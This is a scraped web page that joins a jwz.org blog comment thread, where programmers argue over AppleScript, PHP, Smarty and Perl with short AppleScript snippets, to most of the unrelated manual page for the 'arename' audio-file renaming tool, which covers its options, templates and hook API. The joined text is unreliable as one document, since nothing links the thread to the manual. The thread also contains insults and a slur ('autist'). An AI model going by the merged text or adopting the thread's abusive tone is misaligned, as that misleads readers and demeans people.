I don't know about on Macs or anything (don't own a mac, don't want one), but on Windows boxen, you can access the iTunes services via javascript code run through the Windows cscript/wscript interpreter. I used to make scripts to automate various things talking to iTunes in this manner. It's twisted and sick, but darnit, it does work.
Examples:
boxen? seriously? what kind of autist still uses that terminology?
People who talk about the PC they built to play WoW as "my games rig"
I remember being asked to write a relatively simple app in AppleScript during an Internship, since it was a pain to set up Windows manually for display.
It would create 9 total Instances of various Programs, resize them, move them and initialize them (say, opening web-pages in Safari).
I can still hear the screams of the Mac I used.
Back in a former life (1995, in the glory days of System 7), I found myself needing to use AppleScript in order to get a copy of FileMaker Pro to talk to my then employer's WebStar web server. At the end of the project, I abandoned my own Mac in favor of a PC and learned C shortly thereafter. I don't know how much the language has evolved since then, but based on what you've written here in the past, my guess is "not much at all".
Regarding PHP, I think that language has actually gotten better over time. Of course, I've heard several folks utter the phrase "polishing a turd" with respect to the improvements there, so maybe it's just me.
Is there a language you actually like using these days?
Can't speak for jwz, but, in no particular order,
- C. Well, I don't _like_ it, but it works. That's at least something to respect.
- I'm actually warming up to Python. I still think the whitespace-as-syntax thing is a bullshit gimmick, but the language is... mostly decent.
- For quick and dirty, get-shit-done, Perl is still king. No question.
Just to rant, what with the surge of interest in pseudo-functional programming in Javascript, can we make a licence requirement for anyone trying that to actually at least read an article on functional programming? Because I don't think the vast majority of people doing this shit understand the point of it all, other than using anonymous functions as parameters everywhere. ('Cause it looks cool!') I don't expect them to understand lambda calculus - I doubt most of them have gotten very far past basic highschool algebra - but Jeebus. I recently saw some code where someone was trying, and failing, to implement something with a textbook 4-line recursive solution, in like 70 lines of crap, all written with the trendy "functional" style. I don't know if this is more cargo-cult or trend-junky behavior, but I'd almost rather read ca. 2001 "office web guru" PHP than this shit.
PHP is always going to have the "designed backwards" problem, no matter how many new features are piled on top of it. Nothing is ever going to remove the fact that the original version thought global variables and functions were all you needed and OO programming could be left for version 2... or maybe 5.
Because of that glorious history, every "polished" PHP class is littered with:
$this->foo and $this->bar()
instead of:
$foo and bar()
This is my least favourite feature of the language, because with years of experience in other OO languages I keep forgetting that I need to always tell PHP to operate on the damn class I'm writing now.
That's a rather week criticism of PHP. There is a lot wrong with PHP. But being explicit about your scope is something many argue for, and other languages behave similarly. It should be a a minor annoyance at best.
I don't care if other week [sic] languages have the same problem. A lot of languages with retro-fitted OO syntax have a similar problem, but they generally have the excuse that they're a lot older than PHP.
Searching global scope for functions before class local scope is a pretty clear indication of a language with its priorities bass-ackwards.
I think it is weird how the grammar is supposed to be "natural"... which leads to a casual, almost friendly tone... which belies the fact that you are telling all these applications what to do like some kind of cruel fascist.
tell application "iTunes"
go fuck yourself
end tell
I'm pretty sure that, once upon a time, there was an 'unfriendly' version of Applescript, i.e., one that looked like an actual programming language. Or maybe that just happened in a dream.
A long, long time ago, in a galaxy far, far, Mac OS 8, AppleScript used to come in dialects - several with all the keywords in different languages (and maybe a different grammar), and a planned version with a C-like syntax ("programmer's dialect"). Then they killed them.
Nowadays, enlightened people use the Objective-C Scripting Bridge framework/command line tool combo or the many libraries for doing the same with Ruby, Python, Perl, etc.
AppleScript itself is pretty much spells and leeches.
Another +1 for appscript. It brings much sanity to the world.
Once there was an applescript that could be written in OTHER NATURAL LANGUAGES other than english. Just to say how crazy that thing was. I'm so happy they dropped it.
Even of I even used to program in applescript/italian dialect, yes. O_O
Anyway, you silly snobby perlhead, when Perl 6 went on his "design by committee" permanent iatus, who d'you think kept the web wheels spinning? PHP got the torch. And it's not leaving it.
Even if some of the worst programmers in the world are using it.
Still it's hard to prove the java and .NET crowd is smarter.
I can put up with the COBOL-level verbosity of Applescript. I have never wanted to write more than simple automate-this-application scripts in it, and I can google for appropriate incantations as needed.
What I cannot abide is the half-ass Applescript control interface many applications have. You get the feeling that the implementers wrote interface code to enable the few scripts they tested, then stopped. If the dictionary says an object Foo contains objects Bar, you may or may not be able to iterate over the Bars in Foo.
The fundamental problem with English-like programming languages is that they set expectations way to high, that you can write anything you want and the computer will understand it.
Bob Bane!!! Is that you from the University of Maryland Vax Lab? Been a while. Enjoy a delicious Foo Bar!
Yep, still me. Currently at NASA Goddard - the last time I was paid to write code in a language that didn't suck rocks was ... 2002?
Maybe it's just me and my not getting the zen of Applescript, but when the standard dictionary says an application contains windows, I expect to be able to:
repeat with aWindow in windows
which doesn't work. Maybe I need to look for alternative incantations...
The major annoyance I find with Applescript is that it is so inconsistent between apps. Take Terminal. In Terminal, this does not work:
tell application "Terminal"
set my_tab to first tab of first window
get container of my_tab
end tell
Getting the container of something is pretty basic, and works in nearly everything. Not Terminal.
Or consider this. This does what you would expect in Terminal:
tell application "Terminal"
set current settings of first tab of first window to first settings set
end tell
However, this code, which one would reasonably expect in a sane language to be functionally identical, does not:
tell application "Terminal"
set first_set to first settings set
set current settings of first tab of first window to first_set
end tell
But with a slight modification, it does work:
tell application "Terminal"
set first_set to a reference to first settings set
set current settings of first tab of first window to first_set
end tell
Blech.
APIs differ everywhere; what makes AppleScript so annoying is that it claims to be like a programming language but english and has little other syntax than keywords, which means that the constructs should be polymorphic. It's as if you had to type array{8} for array indexing in one program and list in another.
So to go along with appscript and javascript_OSA there's FScript which is a load of awesome, if you like cocoa and smalltalk.
Congratulations and welcome to the club!
php though arguably worse.
When you say "AppleScript is better than PHP" it is impossible for anyone to believe that you have actually used AppleScript. Seriously.
try javascript ...
I had the same experience: AppleScript Insanity
AppleScript is a bit of a nightmare - how did anyone ever think that it was a good idea?
I did a little bit in PHP before I realised I had an alternative. So glad I get to work in decent languages these days.
Could you please elaborate on why do you think that PHP is a pile of shit?
They can't. Everytime people say this, they never back it up with any substance.
Do you think Facebook would work nearly as well as it does if PHP was such a pile of shit?
Give me a fucking break. Just because it's used in successful products doesn't mean it's not a stinking pile of shit.
Take your language evangelism to your own blog.
I _really_ want to know your full-fledged opinion on this, not trolling or anything; I would like to know it, if possible.
I make a living among other things, by delivering PHP-based stuff to my clients. I've done so for many years and I'm quite happy with the way I can do things in this language.
I've done some public, web-scale projects but mostly intranet stuff with a few hundreds or low thousands of users. LAPP is my stack of choice, and as of late, Eclipse and /or Netbeans for the IDE.
I've cringed a bit on the argument order of some functions, but in general this has been a great platform to work with.
That being said, I know who you are and where you come from (as a programmer, through your blog) and would appreciate your opinion.
The constant, constant stream of security flaws in PHP stems from the fact that they bolted on security (and modern innovations like, I dunno, not using global variables for everything!) long after it was deployed and in wide use. They've tried to incrementally repair all that shit, and made some progress, but can never succeed because those terrible decisions are enshrined at the lowest possible level. Cross-site scriping and SQL-injection holes are as endemic to the design of PHP as buffer overflows are to C: they are built in to the language. Sure, it's possible to write PHP code that doesn't fall into any of these tiger-pits; but in the grand scheme of things, it's unlikely. You're going to miss something, because it's fail-open instead of fail-safe.
Also, just like the fundamental design of Perl encourages you to use regexps for everything possible (since they are far and away the most obvious tool in the box) PHP encourages willy-nilly conflation of view and model/controller, which has been widely understood to be a terrible idea since roughly the Cretaceous. So in PHP, the most obvious way to just get something simple done quickly is a terrible way to do it, and that will come back and bite you in the ass later, even though you got there by thinking, "yeah but I'm in a hurry, so just this once."
And that's just off the top of my head. And I've been drinking. So there you go.
You're right in that conflation of view and model/controller is an obvious way to do things in PHP. Any beginner (and there are lots of these in the PHP world) would think, 'Aha! I'll do it like that.' And you didn't mention another obvious way of doing things in PHP, which is to have a separate PHP file to handle each web page. This is how PHP was meant to be used in the beginning.
But I never get bitten in the arse by these things because I never do them, because I know what I'm doing, and I'm not an idiot. I never think 'just this once', even when I'm in a hurry.
So PHP isn't shit because you're a real man, and you know what you're doing, so stand back, ladies?
Uhhhh.... we got a rising debate star here folks.
It's like being back at school again!
Just to save some personal dignity, I didn't suggest PHP in the other thread out of any loyalty to PHP. It's just there, and convenient for quick shit jobs where I can't be bothered installing/compiling/packagemanaging some behemoth scripting environment. I'm glad you got something that sort of works in the end.
Thanks :-)
Just one more: In your opinion, Which one is the language and/or framework that least encourages bad design and is least fail-open?
All these points pale in comparison to PHP not having a sane, simple command line debugger that ships with the product. Perl, Python, Java and many, many others do. PHP has XDebug, which is is clever and maddening at the same time.
I enjoy working in PHP more than, say, VBScript.
I wrote this summary a while ago, and you asked, so here goes:" [], which goes into detail about the following fundamental flaws:
1. Bad recursion
2. Many PHP-modules are not thread safe
3. PHP is crippled for commercial reasons
4. No namespaces
5. Non-standard date format characters
6. Confusing licenses
7. Inconsequent function naming convention
8. Magic quotes hell
9. Framework seldom used
10. No Unicode
11. Slow
Then there is the mind-set of the PHP language designers and community, which is deeply flawed. Ian Bicking's "PHP Ghetto" article [] sums up the problem with PHP's design and community pretty well:
I think the Broken Windows [] theory applies here. PHP is such a load of crap, right down to the standard library, that it creates a culture where it's acceptable to write horrible code. The bugs and security holes are so common, it doesn't seem so important to keep everything in order and audited. Fixes get applied wholesale, with monstrosities like magic quotes []. It's like a shoot-first-ask-questions-later policing policy -- sure some apps get messed up, but maybe you catch a few attacks in the process. It's what happened when the language designers gave up. Maybe with PHP 5 they are trying to clean up the neighborhood, but that doesn't change the fact when you program in PHP you are programming in a dump.
Jonathan Ellis' "Why PHP sucks" article []."
There is also a lot of great stuff about why PHP is so bad on [] [broken link], quoted in "Why PHP sucks, Part III" []:
"I don't know how to stop it, there was never any intend to write a programming language [...] I have absolutely no idea how to write a programming language, I just kept adding the next logical step on the way".
There you go. The designer of PHP himself admits he literally had no idea what he was doing! It's absolutely foolish to teach PHP as a first programming language. Kids deserve much better than that.
-Don
[Then some moron derped "Smarty is a good way to keep template designers out of your PHP code" so I followed up:]
You are absolutely wrong about Smarty, which is a horribly conceived and implemented disaster. Don't be such a yapping apologist, just because you managed to throw together your home page in PHP without knowing any other languages.
I am speaking from experience, having had to use PHP and Smarty, and having read the source code to Smarty in an vain attempt to figure out how it worked and why it was so difficult to get it to do even the simplest things correctly. I've been much happier using other better designed templating systems, which I will describe below.
You should read Wolf's Rants about PHP: Truth about short open tags and Smarty [].
After this point, the discussion about the tags comes from shopt open tags to "then what should I use for templating?!? and people would go "Wooo! Smarty! Go with Smarty!", and would make me slap people senseless just for saying that. Just as hating PHP for number of damn good reasons, I have a number of hating Smarty to go along with it. Brace yourself, because here it goes:
1. Smarty is programming language
2. Smarty is overkill in majority of cases
3. Speed: Smarty isn't a solution. it's the major problem.
and here go the details about stated points above:
1. Most people would argue, that Smarty is a good solution for templating. I really can't see any valid reasons, that that is so. Specially since "Templating" and "Language" should never be in the same statement. Let alone one word after another. People are telling me, that Smarty is "better for designers, since they don't need to learn PHP!". Wait. What? You're not learning one programming language, but you're learning some other? What's the point in that, anyway? Do us all a favour, and just *think* the next time you issue that statement, okay?
2. I think, that "overkill" is an understatement. You're trying to disguise simple outputting in a complex set of classes,which implements a programming language inside of it -- Definitively overkill". "But it does caching". No, not really. "Caching", in the terms of Smarty is nothing else than converting that template code into PHP. See? I told you there is no point in using Smarty. It doesn't make your life easier. It doesn't make developer's life easier, and it doesn't make server's life easier.
3. The previous paragraph says it all about the speed slugs in Smarty, but I feel the urge to recap that:
1. "caching" mechanism sucks. It's not a proper caching. It's just a conversion of one interpreted language to another one. and in very unoptimized way. If you want to do the proper cachin, go with APC, Zend optimiser or EAcellerator.
2. The implementation of one interpreted language in another interpreted language does nothing but slow everything down
[I wrote some constructive criticism about how templating should be done in the rest of the message, here:
Looks like PHP is on par with Perl, Ruby. It's a solid runner to Python and in a completely different league than everything else.
I don't think the broken windows theory applies to the PHP world.
In my opinion, people write crap PHP because the companies that pay for these sort of applications actually want a cheap, shoddy product (well cheap, mainly). Therefore they choose PHP because it's the easiest language to learn, and so they can employ cheap programmers, who are also crap. Then the companies encourage these programmers to write crap code as quickly as possible. No effort is spent on maintainability because these sorts of companies don't care about that, and they wouldn't even realize if their programmers were writing anything good or not. There is a culture of crap. It's not that there's a broken window here or there, it's just that most PHP applications were built like a shanty town right from the word go.
PHP5 has namespacing, magic quotes should always be off anyway, and see the mbstring extension for Unicode support.
I agree with most of the rest of your post, though I quite like PHP (or should I say I'm very comfortable with it) due to having an intimate familiarity with the language at this point. To each his own.
What's wrong with PHP:
What's wrong with Smarty:
I also think Smarty sucks big time. Tried it once, deleted it after a few minutes.
Lets not forget that Facebook had to write their interpreter:
Do you think Facebook would have written it's own interpreter if PHP wasn't such a pile of shit?
Facebook wrote (basically) a PHP-to-C compiler, for speed. My complaints about PHP have nothing to do with performance, and anyway, not all sites have Facebook's performance requirements.
Damn you for making me defend PHP, but you're slamming it for the wrong reasons.
Thanks for the clarification. Didn't realize that FB wrote a PHP to C++ translator and than complied with g++:
Summary
* I was supporting the "PHP is slow" complaint voiced in other comments/links
* Doesn't using C++ solve other PHP problems, like multi-threading?
* Does translating to C++ imply PHP is fundamentally flawed, not just slow?
* What language/framework should we use for websites? Python? Perl? ROR?
Jeff's Theorem:
All websites becomes usenet.
Doesn't using C++ solve other PHP problems, like multi-threading?
No. Not only does PHP lack thread-safety (variable/object synchronization/locking), the core library functions and extensions that are currently not thread-safe will need to be rewritten to take advantage of the feature. Translating to C++ doesn't have anything to do with this.
Does translating to C++ imply PHP is fundamentally flawed, not just slow?
No? Why would it? PHP is flawed in many aspects, but translating to C++ doesn't address them. It just means every time a page is requested there's no interpretation going on, since the script has been translated and compiled to a native binary.
What language/framework should we use for websites? Python? Perl? ROR?
Use whatever you're comfortable with. I've been writing PHP for 10 years, and just because it isn't perfect doesn't mean it isn't a usable language if you understand its flaws and are aware of its limitations.
Because monolinguistic people like you use it as their first and only language, without realizing its deep and horrible flaws.
If you learned a second language, you'd realize that programming doesn't have to be so horrible.
Oh hi Don, big fan of yours. I love your cranky programmer aficionado screeds, and micropolis. ^_^
It seems that you are a programmer of note, so kudos to you.
But I'm not monolingual, and inferring so from a simple question it's not that smart.
Well, it's either monolingual, or dense. Take your pick.
though to be fair to you, I wanted to know jwz's full opinion too, even if I already know PHP Is flawed, and why. I like reading big rants from JWZ and Don Hopkins. So I take that last comment back.
Everything went better than expected
:-) | http://www.jwz.org/blog/2011/05/computational-feces/ | CC-MAIN-2014-10 | refinedweb | 4,306 | 72.36 |
27 September 2012 03:55 [Source: ICIS news]
SINGAPORE (ICIS)--China’s Shandong Haili Chemical Industry is currently running its new 150,000 tonne/year adipic acid (ADA) plant in Jiangsu province at around 50% of capacity, a company source said on Thursday.
The plant, which is the company’s first ?xml:namespace>
“Currently, the operating rate was just around 50% since it just started up,” the source said.
The company started trial runs at the new unit in mid-September, the source said.
The plant’s start-up was delayed several times because of weak market demand.
Shandong Haili has also built a second 150,000 tonne | http://www.icis.com/Articles/2012/09/27/9598976/Chinas-Shandong-Haili-runs-new-ADA-unit-at-around-50.html | CC-MAIN-2014-41 | refinedweb | 108 | 63.49 |
Automatically rename audio files by tagging information
arename [\s-1OPTION\s0(s)] \s-1FILE\s0(s)...
Sets the ambiguoususefirst option. See below for details.
Prints the version of the arename script and the version of the Perl module, that contains most of the code. These versions should be the same. If not, that would indicate a possibly broken installation.
Copy files instead of renaming (moving). This can be useful to copy tracks from your audio archive to a portable device for example.
Enable debugging output. This actually sets `verbosity' to 10000. This output option will cause very noisy output. You probably want something less verbose, like `--verbosity 20'.
Do not make use of hooks of any sort (neither global nor local ones).
Do not use configuration profiles (see below). Overwrites the useprofiles setting.
Go into dryrun mode. This means, that no action will be taken. arename will print what it would do, if called without -d.
Explicitly enable hooks.
Overwrite files if needed.
Display a short help text.
List the current configuration in the actual configuration format.
Lists all file types currently supported by arename, one type per line.
Lists all extensions recognised file name extsionsion for type <type>, one extension per line. If a list of types is given as a comma-separated list, extensions for all listed types are listed.
Print a list of profile names defined in the active configuration. (This is primarily used by the zsh completion for the --profile option.)
Read a local config file (./.arename.local). Overwrites the uselocalrc configuration setting.
Read filenames from stdin after processing files given on the command line. It reads one file name per line, which means that file names containing newlines are not supported.
Display version information.
Sets the `verbosity' setting to `integer-value'.
When a file is skipped, because its name would not change, this option will cause arename to suppress any output. This sets the `suppress_skips' option. Note that if the `verbosity' setting is at a high enough level, you may still get messages about the file being processed in the first place.
Read file instead of ~/.arenamerc.
Read file after ~/.arenamerc and before ./.arename.local.
Define a prefix for destination files.
Define a list of one or more profiles to use forcibly, no matter if they would be activated normally or not.
Define a template, that will be used for files that contain a compilation tag.
Define a generic template (for all files that do not contain a compilation tag).
Set a user defined variable to a given value (see \*(L"User defined variables\*(R" below).. If changes to the --long-option interface are done, that will happen with an appropriate deprecation phase, so users can adjust. 3.x to 4.0 can be found in the project's \s-1CHANGES\s0 file and general advice about incompatible changes from major version to major version are documented in the \s-1UPGRADING\s0 file.
The following options are deprecated and will be removed in a later version of arename.
This option is a short hand for \*(L"--verbosity 10\*(R".
This option is a short hand for \*(L"--verbosity 5\*(R".
This is a short hand for \*(L"--verbosity 20\*(R". \*(L"Configuration files\*(R", by the template and comp_template settings (See \*(L"\s-1SETTINGS\s0\*(R".
Since version 4.0, arename supports a lot more file formats than it used to (version 3.0 only supported .mp3, .ogg and .flac files). Thanks to Audio::Scan, we now support a much wider range of file types, of which most may exist using different file name extensions (e.g. *.ogg and *.oga are both of the type ogg).
You may use the `--list-file-types' and `--list-ext-for-type' options to find out which file type is mapped to which file name extensions.
If you would like support for another file type in arename, you will have to persuade the Audio::Scan developers to extend their module with said feature. Adding support for it in arename after that should be trivial.
To give you an idea, arename (in connection with Audio::Scan 0.85) let's you rename mp3, mp4, aac, ogg, flac, asf, musepack, monkey audio, wav (this type also supports aiff) and wavpack. \s-1GNU\s0 find for instance, did not support the + way for a long time. If you are stuck with an old version, you can exchange the + with a ; (note, that a semicolon must be quoted in any case), or use \s-1TEMPLATE\s0 section; and reading that section is the minimum effort you will want to go through.
After that, you can open the file ~/.arenamerc in your favourite text editor and resemble the following text (and presumably change the few values in there to your liking):
# \*(L"\s-1HOOKS\s0\*(R" part even further below is for you. \s-1ARENAME_LOAD_QUIET\s0 being absent from the environment - will cause arename to start up in its normal manner.
When set to 1 (and only 1 - arename will ignore any other setting), arename will turn off its output colourations. As of version 4.0, arename uses Term::ANSIColor to produce output, that features terminal colours.
arename's behaviour can be altered by a number of files it reads when starting up.
Normal configuration tasks are done in (how convenient) \*(L"Configuration files\*(R", described below.
If you need more control, or want to solve special problems you are having, you can do so by supplying Perl code in \*(L"Hook definition files\*(R".):
per-user normal configuration file. \*(L"User defined variables\*(R":
Profile related configuration files; read if \s-1PROFILENAME\s0 is active. They are read after a intermediate config file defined by --post-rc and a local config file (if enabled).
Profile related \*(L"Hook definition files\*(R" (see below for details); read if \s-1PROFILENAME\s0 is active. These files are read, between global and local hook-definition files.
In order to define profiles, you need to use the profile keyword:
profile <name> <pattern>
Where name is a string, that is used in the place of \s-1PROFILENAME\s0.
# switch on verbosity verbosity 20
#
Defines global hooks, that are in effect in every directory if the usehooks option is set to true.
This allows you to define special hooks, that will only be applied for processes that run in the directory the local file is found (and if the uselocalhooks option is set to true).
For details about hooks in arename, see \*(L"\s-1HOOKS\s0\*(R" below.
The following settings are supported in all configuration files.
Not all of them are usable in sections. The ones you can use in sections are: All default_* options, force, prefix, sepreplace, tnpad, comp_template and template.
Some tag types support setting the sametag multiple times. The scanning backends before arename 4.0 did not support such tags. When this option is set to false (default), arename gives up when it encounters such tags. When set to true, arename just uses the first value it encounters. For maximum control over how tags with ambiguous values are handled, you may use the `ambiguoustag' hook. (default: false)
If set, a given file name will be transformed to its cleaned up absolute path. You may want to set this, if you are using sections in the configuration. If you do not use sections, all this will give you is a performance penalty. (default value: false))
If set, arename will inspect all template and comp_template settings for possible problems. Unsetting this option probably only makes sense, if you are working with templates within hooks and know what you are doing. Normal users will most likely want to stick with the default. (default: on)
Defines a template to use with files that provide a compilation tag (for 'various artist' CDs, for example). This setting can still be overwritten by the --compilation-template command line option. (default value: va/&album/&tracknumber - &artist - &tracktitle)
default_artist, default_album, default_compilation, default_genre, default_tracknumber, default_tracktitle, default_year Defines a default value, for the given tag in files, that lack this information. (default value: undefined)
If this is set to false, arename will continue execution even if reading, parsing or compiling a hooks file failed. (default value: false)
Defines a prefix for destination files. Setting this to '/foo/bar' results in destination files named '/foo/bar/Expanded Template.ogg' This setting can still be overwritten by the --profile command line option. (default value: .)
Tagging information strings may contain slashes, which is a pretty bad idea on most file systems. Therefore, you can define a string, that replaces slashes with the value of this setting. (default value: _)
Like the `--suppress-skips' command line option, this disables messages for files that arename will skip because the file name would not change.)
If this option is set, arename allows the use of abbreviated taq names in template and comp_template. See \*(L"Available expression identifiers\*(R" below for details. (default value: off)
This defines the width, to which the track number field is padded with zeros on the left. Setting this to zero disables padding. (default value: 2)
If set to true, use hooks defined in ~/.arename.hooks. (default value: true)
If set to true, use hooks defined in ./.arename.hooks.local. (default value: false)
If set to true, read a local configuration file (./.arename.local), if it exists. (default value: false)
If set to true, configuration profiles will be used. If false, they are not. (default value: true)
One file type may be used for different file name extensions. For example, files matching *.ogg and *.oga will both be handled as type ogg in Audio::Scan (the information gathering backend, arename is using since version 4.0). When this option is set to true, a file matching *.oga would be renamed using .ogg as the extension, since its type is ogg. Otherwise, the original extension is left untouched. (default: true)
Integer option, that sets the verbosity of arename's output. The default value is `10'. The `--verbosity' option may be used to override this setting.
Switches on the dryrun option (if not enabled already), as soon as the configuration file parser encounters non-fatal warnings. This option was introduced to avoid destructive behaviour due to incorrect lines in any of the configuration files. (default value: true).
You can use the set command in arenamerc files. This way the user can define his own variables. The namespace is separate from arename's normal settings. (That means, you cannot, for example, overwrite the internal template variable with this command.)
The sytn \*(L"\s-1HOOKS\s0\*(R" below). Starting with version 4 of arename, user defined variables may also be defined within sections, which (just like normal option) makes them applicable only if said section is used for a given file.
arename's templates are fairly easy to understand, but powerful.
At simplest, a template is just a fixed character string. However, that would not be exactly useful, because then every file you would ever want to rename would be getting the exact same name. That is why arename is able to expand certain expressions with information gathered from the file's tagging information.
An expression basically looks like one of the following forms:
This is the `trivial' expression. It will expand to the information stored within the corresponding tag. If the tag in question is not available, the expansion of the template string will fail.
The `sized' expression. The length modifier in square brackets defines the maximum length, to which the expression should be expanded. That means, if the artist of a file reveals to be 'Frank Zappa', then using '&artist[1]' will expand to 'F'.
This is the first complex expession, called `complex-default'. When the tag, which corresponds to `identifier' is available, this expression will expand exactly like the trivial expression would. If it is not available though, the expansion doesn't fail, but instead the `default-template' string is expanded.
This expansion is called `complex-set-unset'. Again, what will be used during template expansion depends on whether the tag which corresponds to `identifier' is set or not. If it is set, the string set-template is expanded; if it is unset, the unset-template string is used.
Both simple expansions may be used with braces, like the complex expansions are:
This is equal to `&identifier'.
And this is equal to `&identifier[length]'.
Backslashes are special in template strings, because they are used to quote characters that bear special meaning (for example, to get a ampersand character, you need to use "\&"). To get an actual backslash in the resulting string, you need to use a backslash, quoted by a backslash. A backslash on non-special characters is silently dropped.
In complex expressions, the strings called `default-template', `set-template' and `unset-template' are subject to regular template expansion. Hence, expressions like the following are possible:
"&{album?&album/!}"
If `album' were set, it would expand to its value followed by a slash; otherwise it would expand to nothing. Using this, it is fairly easy to deal with album-less tracks:
"&artist/&{album?&album/&tracknumber. !-no-album-/}&tracktitle"
That will effectively use the following template if `album' is set:
"&artist/&album/&tracknumber. &tracktitle"
But if it is not set, it will instead use this:
"&artist/-no-album-/&tracktitle"
Caution has to be taken if certain characters are to be used within conditional template expressions. For example, to use a closing curly bracket in either of them, it needs to be quoted using a backslash character.
Similarly, if an exclamation mark is to be used in a `set-template', it needs to be quoted by a backslash to avoid the character being interpreted as the end of the `set-template' string.
The data, that is expanded is derived from tagging information in the audio files. There are two kinds of information available. One is the purely informational tag (like a track's artist) and the other further describes the format of the audio file (like the file's bitrate).
If you are defining a lot of templates on the command line, you may find that these identifiers take quite a while to type. If the template_aliases option is set, you may use shorter alias names instead of the the real identifier. Available aliases are listed with their corresponding idetifier below.
This is a list of all all informational identifiers available for all file-types:
The album the currently processed track is part of. (alias: al)
The artist for the current track. (alias: ar)
Compilation tags are not very stable across different file types. Usually, this is set to a string like "Various Artists" for tracks that are part of some sort of compilation album (like motion picture sound-tracks). (alias: cmp)
The genre or content type of the audio file. (alias: gn) \*(L"\s-1SETTINGS\s0\*(R"). (alias: tn)
The title of the currently processed track. (alias: tt)
Chronological information about the track (usually the year a song was written or the year the album a track is part of was released). (alias: yr)
Here is a list of file-format information tag available for all file-types:
The bitrate the file was recorded/encoded with. (alias: br)
The number of channels available in the file (for example, this is `2' for stereo files). (alias: ch)
The length of the track in milli-seconds. (alias: ln)
The samplerate the file was recorded/encoded with. (alias: sr)
For all file-types, the following tags are generated from the ones listed above (for convenience):
Kilobits per second (bitrate / 1000). (alias: kbr)
Kilosamples per second (samplerate / 1000). (alias: ksr)
The length of the track in seconds. (alias: ls)
Some tags are only available for certain file-types. They are always called `type_*'. File-type specific identifiers do not have alias names. Here is a list of those tags:
The word-size used in a flac file. `24' if samples are 24 bits wide.
The version of the id3 tag used in mp3 files (e.g. "ID3v2.3.0").
The same as `mp3_id3_version', but for wave files.! \s-1HOOKS\s0 \s-1ARE\s0 A \s-1BIG\s0 \s-1HAMMER\s0, \s-1THAT\s0 \s-1CAN\s0 \s-1CRUSH\s0 \s-1PROBLEMS\s0 \s-1AS\s0 \s-1WELL\s0 \s-1AS\s0 \s-1LIMBS\s0!
You have been warned! \*(L"\s-1FILES\s0\*(R"). They are run at certain events during the execution of arename. The contents of the argument list for each hook depends on what hook is called (see the \*(L"List of hook events\*(R" \*(L"Utility subroutines\*(R" below).
The keys in various data hashes passed to the hooks can be one of the following: album, artist, compilation, genre, tracknumber, tracktitle, year.
Registration subroutines
There are two subroutines, that are used to tell arename about subroutines, you defined that shall become hooks.
Registers a code reference (read: your subroutine) for the given event. Example: register_hook('startup', \&custom_banner);
Removes all entries of the code reference for the given event. Example: remove_hook('startup', \&custom_banner); If the coderef was added more than once, all entries are removed.
File access and manipulation
The currently processed file name can be accessed via two subroutines:
Returns the current file name as a string. This way, you can get the name of the currently processed file in every hook.:
Returns the current value of setting. This is always a scalar"
\s-1API\s0 for accessing to arename's internal configuration
You can also access the configuration data of arename itself:
Returns the current value of setting. This is always a scalar value.
Change the value of setting to value.
A list of settings arename will use: canonicalize, dryrun, force, hookerrfatal, prefix, quiet, quiet_skip, readstdin, sepreplace, tnpad, usehooks, uselocalhooks, uselocalrc, verbose, verbosity, comp_template and template.
If you want to actually change these settings, you should have a profound knowledge of arename's internals. Be careful.
\s-1API\s0 for default_* settings
If you need to access the current values of the default_* settings:
Returns the value of default_tagname.
Returns a lexically sorted array of tag names of currently set default_* values.
Sets the value of default_tagname to value.
Miscellaneous subroutines
And finally, a few miscellaneous functions ARename.pm provides, that might be of interest.
Return the appropriate template (normal versus compiliation template) by the data in the referenced data hash.
Return the expanded version of template string. The information, that is used to do the expansion is taken from the referenced data hash. Keep in mind that this function calls hooks itself. Avoid endless loops! See \*(L"Hooks when expanding the template\*(R" for details.
Makes sure directory exists. Think: mkdir -p directory.
Returns 1 if the tag tagname is supported by arename, 0 otherwise.
This tokenises a template string and then looks at the whole token tree, and tries to figure out any potential problems in it. If tokenisation already failed, a negative value is returned. In case of any warnings with the token tree, zero is returned. If nothing came up, a positive value is returned. This subroutine is called for the `template' and `comp_template' strings in all sections when arename starts. If the user chooses to change a template string in a hook it is recommended to use this function to avoid any errors due to broken templates.
Renames src to dest. Works across file systems, too. Dies if something fails.
This is a complete list of hooks events with descriptions.
The first argument (argument number \*(L"zero\*(R") for every hook is the name space they are called in. To find out the name of the currently processed file, use the get_file() subroutine described above.
Hooks in the main loop
These hooks are called at the highest level of the script.
This is called in the middle of the file name canonicalization process (but only if the canonicalize setting is set). You can get the current file name via get_file(). The canonicalized file name is handed to you via the hook's arguments. The value from this argument will be assigned to the processed filename after the execution of this hook. Arguments: 1: canonicalized file name
Called at the start of the main loop before any file checks and canonicalizations (if enabled) are done. Arguments:
Called in the main loop after the file checks and canonicalizations are done. In this context, file checks means tests for read-access and for whether the processed file is a symlink. arename will refuse to process symlinks and files it cannot read. Arguments:
Called in the main loop after the file has been processed (unless filetype_unknown was triggered, see below). Arguments:
Called in the main loop after the file was tried to be processed but the file type (the extension, specifically) was unknown. Arguments:
Called when it has been established, that the file in question should theoretically be supported by arename. Arguments: 1: the current file name extension 2: the file type that has been detected
This is triggered directly before the actual file renaming process starts. All information about the file has been gathered at this point. Arguments: 1: the file type, 2: the extension that will be used to assemble the target filename, 3: the data hash
Hooks in the renaming procedure
When all data has been gathered, arename will go on to actually rename the files to their new destination name (which will be generated in the process, see \*(L"Hooks when expanding the template\*(R" below).
This is the first action to be taken in the renaming process. It is called even before the default values are applied. Arguments: 1: data hash, 2: file extension
Called before template expansions have been done. Arguments: 1: data hash, 2: file extension
Called after the template has been expanded and the new file name has been completely generated (including the destination directory prefix). Arguments: 1: data hash, 2: file extension 3: the generated new filename (including directory prefix and file extension)
The destnation directory for the new file name may contain sub directories, which currently do not exist. This hook is called after it is ensured, every directory portion exists. Arguments: 1: data hash, 2: file extension 3: the generated new filename (including directory prefix and file extension). To do this, arename first tokenises the template string into a data structure, which is later used to assemble the target file name.
Called before any expansions are done. Arguments: 1: the template string, 2: the data hash
Called after all expansions have been done, right before the the resulting string is returned. Arguments: 1: the template string (fully expanded), 2: the data hash
Called each time the value of an existing tag is expanded. This may be more than once, as tags may be used as often in a template as the user requires. At each point, this hook will be called right before the data was retrieved and post-processed (like zero-padding the `tracknumber' tag). Arguments: 1: the tag's name, 2: the data hash
Called each time the value of an existing tag is expanded. Like with the `expand_template_pre_expand_tag' hook, this may be more than once. At each point, this hook will be called right after the data was retrieved and post-processed. Arguments: 1: the value, which will be used for expansion, 2: the tag's name, 2: the data hash
Hooks while gathering information
